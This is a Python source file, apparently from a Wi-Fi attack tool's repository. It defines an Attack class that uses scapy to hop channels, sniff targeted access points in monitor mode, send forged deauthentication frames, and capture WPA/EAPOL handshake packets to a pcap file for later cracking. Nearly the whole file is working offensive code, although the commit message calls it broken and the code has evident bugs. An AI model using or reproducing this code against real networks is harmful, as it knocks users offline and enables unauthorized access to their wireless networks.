f2c940ae37
Many changes performed in development of Hidden Dragon hdragon command is broken for development
114 lines
4.3 KiB
Python
114 lines
4.3 KiB
Python
# Copyright (c) 2024 Anoduck
|
|
#
|
|
# This software is released under the MIT License.
|
|
# https://opensource.org/licenses/MIT
|
|
from scapy.sendrecv import AsyncSniffer
|
|
from scapy.sendrecv import sendp
|
|
from scapy.layers.dot11 import Dot11
|
|
from scapy.layers.dot11 import RadioTap
|
|
from scapy.layers.dot11 import Dot11Deauth
|
|
from scapy.layers.eap import EAPOL
|
|
from scapy.utils import PcapWriter
|
|
from random import choice
|
|
import pandas as pd
|
|
from .dataframe import CtigerDataFrame
|
|
from time import sleep
|
|
import os
|
|
import threading
|
|
|
|
|
|
class Attack:
|
|
|
|
def sniff_stop(self, pkt):
|
|
global hndshk_frag
|
|
hndshk_frag = 0
|
|
|
|
pktdmp = PcapWriter('ctiger_handshake.pcap', append=True, sync=True)
|
|
pktdmp.write(pkt)
|
|
|
|
if EAPOL in pkt:
|
|
hndshk_frag += 1
|
|
else:
|
|
hndshk_frag = 0
|
|
|
|
if hndshk_frag >= 10:
|
|
hndshk_frag = 0
|
|
return True
|
|
|
|
def feed_gather(self, mon_dev, targ, lock):
|
|
while True:
|
|
with lock:
|
|
fg_asf = AsyncSniffer(stop_filter=self.sniff_stop,
|
|
iface=mon_dev, monitor=True)
|
|
self.log.info('Starting pkt gather')
|
|
fg_asf.start()
|
|
# log.info('Setting mon_dev channel to ', channel)
|
|
pkt = RadioTap()/Dot11(type=0, subtype=4,
|
|
addr1="ff:ff:ff:ff:ff:ff",
|
|
addr2=targ, addr3=targ)/Dot11Deauth()
|
|
self.log.debug('sending deauth to ', targ, ' with type 4')
|
|
sendp(pkt, iface=mon_dev, verbose=0)
|
|
pkt = RadioTap()/Dot11(type=0, subtype=12,
|
|
addr1="ff:ff:ff:ff:ff:ff", addr2=targ,
|
|
addr3=targ)/Dot11Deauth()
|
|
self.log.debug('sending deauth to ', targ, ' with type 12')
|
|
sendp(pkt, iface=mon_dev, verbose=0)
|
|
|
|
def grab_macs(self, pkt):
|
|
if pkt.haslayer(Dot11):
|
|
if pkt.type == 0 and pkt.subtype == 4:
|
|
if pkt.info != '':
|
|
self.log.debug('mac: ', pkt.addr2)
|
|
return pkt.addr2
|
|
|
|
def chan_hopper(self, mon_dev, channels, lock):
|
|
self.log.info('Channel hopper started.')
|
|
chlist = list(set(channels))
|
|
chlist.sort()
|
|
chlist.remove(',')
|
|
chans = [int(chan) for chan in chlist]
|
|
while True:
|
|
with lock:
|
|
ichan = choice(chans)
|
|
iw_cmd = 'iw dev ' + mon_dev + ' set channel ' + str(ichan)
|
|
os.system(iw_cmd)
|
|
self.log.debug('Channel set to ', str(ichan))
|
|
sleep(14.7)
|
|
# return ichan
|
|
|
|
def attack(self, mondev, scan_file, net_file, log):
|
|
self.log = log
|
|
self.mon_dev = mondev
|
|
self.scan_file = scan_file
|
|
self.net_file = net_file
|
|
log.info('Beginning Attack')
|
|
targets = pd.read_csv(self.scan_file, index_col=0)
|
|
tpairs = targets.drop(columns=['crypt', 'ssid'])
|
|
pd_chan_list = tpairs.channel.to_list()
|
|
channels = list(set(pd_chan_list))
|
|
log.debug('Channel Type: ', str(type(channels)))
|
|
pd_bssid_list = tpairs.bssid.to_list()
|
|
bssids = list(set(pd_bssid_list))
|
|
log.info('Channel list: ', str(channels))
|
|
log.info('BSSID list: ', str(bssids))
|
|
asniff = AsyncSniffer(iface=self.mon_dev,
|
|
prn=self.grab_macs,
|
|
monitor=True, store=False)
|
|
asniff.start()
|
|
log.info('Starting channel hopper')
|
|
lock = threading.Lock()
|
|
while True:
|
|
ch_thread = threading.Thread(target=self.chan_hopper,
|
|
name='chopper',
|
|
args=(self.mon_dev, channels, lock))
|
|
ch_thread.start()
|
|
ares = asniff.results
|
|
if ares is not None:
|
|
for row in ares:
|
|
if row[1] in targets:
|
|
log.info('Found target: ', row[1])
|
|
fg_thread = threading.Thread(
|
|
target=self.feed_gather,
|
|
name='feeder',
|
|
args=(self.mon_dev, row, lock))
|
|
fg_thread.start()
|